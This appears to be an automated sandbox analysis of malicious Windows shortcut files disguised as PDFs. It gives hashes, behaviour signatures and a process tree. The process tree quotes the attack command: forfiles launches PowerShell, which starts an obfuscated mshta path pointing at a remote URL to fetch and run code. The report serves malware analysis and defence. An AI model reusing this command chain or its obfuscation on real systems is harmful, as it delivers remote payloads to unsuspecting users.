Analysis

max time kernel: 122s
max time network: 127s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 25-10-2024 17:24
Static task
  static1

Behavioral task
  behavioral1
  Sample: A/3rd_cc_form_Oct_2024.pdf.lnk
  Resource: win7-20240903-en

Behavioral task
  behavioral2
  Sample: A/3rd_cc_form_Oct_2024.pdf.lnk
  Resource: win10v2004-20241007-en

Behavioral task
  behavioral3
  Sample: A/Agreement for YouTube cooperation.pdf.lnk
  Resource: win7-20241023-en

Behavioral task
  behavioral4
  Sample: A/Agreement for YouTube cooperation.pdf.lnk
  Resource: win10v2004-20241007-en

Behavioral task
  behavioral5
  Sample: A/Instruction_1928.pdf.lnk
  Resource: win7-20240903-en

Behavioral task
  behavioral6
  Sample: A/Instruction_1928.pdf.lnk
  Resource: win10v2004-20241007-en
General

Target: A/Instruction_1928.pdf.lnk
Size: 2KB
MD5: b874532b90be5bd56eca4b28951f2f76
SHA1: 0356abd795c63a10cad9383a767687c92fc1b5f8
SHA256: 92216ebdd28ee3a886e296fd4ef8c5341b8c9dba8f1d1c498db62c95efc97262
SHA512: 036d26c62b65af38075842642708cf3e3f8eaef05025a7b3449d39e2f15c09a80cfd79ddf411c6d6d1aadd7fca4a462c4f86b5f1375166928457b759822586d3
Malware Config

Signatures

Indirect Command Execution (1 TTPs, 1 IoCs)
  Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (1 IoCs)
  Processes:
    pid   Process
    2772  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes:
    description              pid   Process
    Token: SeDebugPrivilege  2772  powershell.exe

Suspicious use of WriteProcessMemory (6 IoCs)
  Processes:
    description                        pid   Process       procid_target
    PID 2308 wrote to memory of 2804   2308  cmd.exe       32
    PID 2308 wrote to memory of 2804   2308  cmd.exe       32
    PID 2308 wrote to memory of 2804   2308  cmd.exe       32
    PID 2804 wrote to memory of 2772   2804  forfiles.exe  33
    PID 2804 wrote to memory of 2772   2804  forfiles.exe  33
    PID 2804 wrote to memory of 2772   2804  forfiles.exe  33
Processes

1. C:\Windows\system32\cmd.exe
   cmd /c C:\Users\Admin\AppData\Local\Temp\A\Instruction_1928.pdf.lnk
   - Suspicious use of WriteProcessMemory
   PID: 2308

   2. C:\Windows\System32\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p C:\ /m Use*s /c "powershell Start-Process \*i*\*2\m?h*e https://ftp.timeless-tales.shop/api/reg/Panto"
      - Indirect Command Execution
      - Suspicious use of WriteProcessMemory
      PID: 2804

      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         Start-Process \*i*\*2\m?h*e https://ftp.timeless-tales.shop/api/reg/Panto
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         PID: 2772